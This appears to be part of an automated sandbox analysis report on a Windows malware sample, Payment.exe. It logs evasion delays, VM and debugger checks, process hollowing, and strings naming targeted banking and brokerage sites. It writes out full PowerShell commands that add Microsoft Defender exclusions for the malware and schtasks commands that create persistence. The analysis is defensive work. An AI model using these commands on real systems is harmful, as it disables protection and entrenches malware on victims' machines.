                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 592923Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 592797Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599843
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599734
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599625
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599516
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599404
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599296
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599076
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598968
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598858
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598649
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598547
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598438
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598320
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598188
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598078
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597963
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597860
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597750
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597640
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597532
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597422
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597313
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597178
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597047
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596938
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596601
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596485
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596373
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596265
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596122
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595986
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595875
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595766
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595656
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595542
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595438
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595328
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595219
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595110
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595000
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594694
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594448
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594342
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594234
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594101
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594000
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 593891
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 593773
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 593672
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual NetLP`
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: Spectrum.exe, 0000001B.00000002.2108208802.0000000000567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
                  Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: Spectrum.exe, 0000001B.00000003.918765946.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                  Source: Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2143808453.0000019D59253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2143618359.0000019D5923E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: SensorDataService.exe, 00000019.00000003.904956749.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.918765946.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI
                  Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: N`SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0I`SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driveresources
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: Spectrum.exe, 0000001B.00000002.2111802425.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverJ
                  Source: AppVClient.exe, 0000000E.00000003.874415639.0000000000607000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000E.00000002.889135611.000000000061E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000E.00000003.873860693.0000000000600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineL
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device~p_
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: Spectrum.exe, 0000001B.00000003.918765946.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter,&_
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: svchost.exe, 0000002B.00000002.2128529484.0000019D53A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                  Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0z`SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Devicebg`
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: ssh-agent.exe, 0000001C.00000002.2108373436.0000000000427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: SensorDataService.exe, 00000019.00000003.904956749.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.918765946.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
                  Source: snmptrap.exe, 0000001A.00000002.2108376787.00000000005E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}Y
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                  Source: Payment.exe, 00000008.00000002.2167539914.0000000004E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: jwBqGZseW.exe, 00000027.00000002.2124480246.000000000135D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                  Source: Spectrum.exe, 0000001B.00000003.918860232.00000000005F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
                  Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000002.2111802425.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.920212205.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                  Source: Spectrum.exe, 0000001B.00000003.920212205.00000000005E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
                  Source: SensorDataService.exe, 00000019.00000003.905004663.00000000005FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e`SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: C:\Users\user\Desktop\Payment.exeAPI call chain: ExitProcess graph end nodegraph_8-117297
                  Source: C:\Users\user\Desktop\Payment.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00402000 LoadLibraryA,GetProcAddress,LdrInitializeThunk,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_00402000
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00402000 LoadLibraryA,GetProcAddress,LdrInitializeThunk,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_00402000
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_00751130 mov eax, dword ptr fs:[00000030h]23_2_00751130
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_00793F3D mov eax, dword ptr fs:[00000030h]23_2_00793F3D
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 39_2_0047D587 mov eax, dword ptr fs:[00000030h]39_2_0047D587
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 39_2_0047D394 mov eax, dword ptr fs:[00000030h]39_2_0047D394
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 39_2_02E51130 mov eax, dword ptr fs:[00000030h]39_2_02E51130
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 39_2_02E93F3D mov eax, dword ptr fs:[00000030h]39_2_02E93F3D
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0040ADB0 GetProcessHeap,HeapFree,8_2_0040ADB0
                  Source: C:\Users\user\Desktop\Payment.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeProcess token adjusted: Debug
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040E61C
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,LdrInitializeThunk,8_2_00416F6A
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_00791361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00791361
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_00794C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00794C7B
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 39_2_02E91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_02E91361
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 39_2_02E94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_02E94C7B
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQuerySystemInformation: Indirect: 0x9B8462
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtAdjustPrivilegesToken: Indirect: 0x9B864C
                  Source: C:\Users\user\Desktop\Payment.exeMemory written: C:\Users\user\Desktop\Payment.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory written: C:\Users\user\AppData\Roaming\jwBqGZseW.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp"
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E68550 GetVolumeInformationW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,8_2_02E68550
                  Source: C:\Users\user\Desktop\Payment.exeCode function: GetLocaleInfoA,8_2_00417A20
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Users\user\Desktop\Payment.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
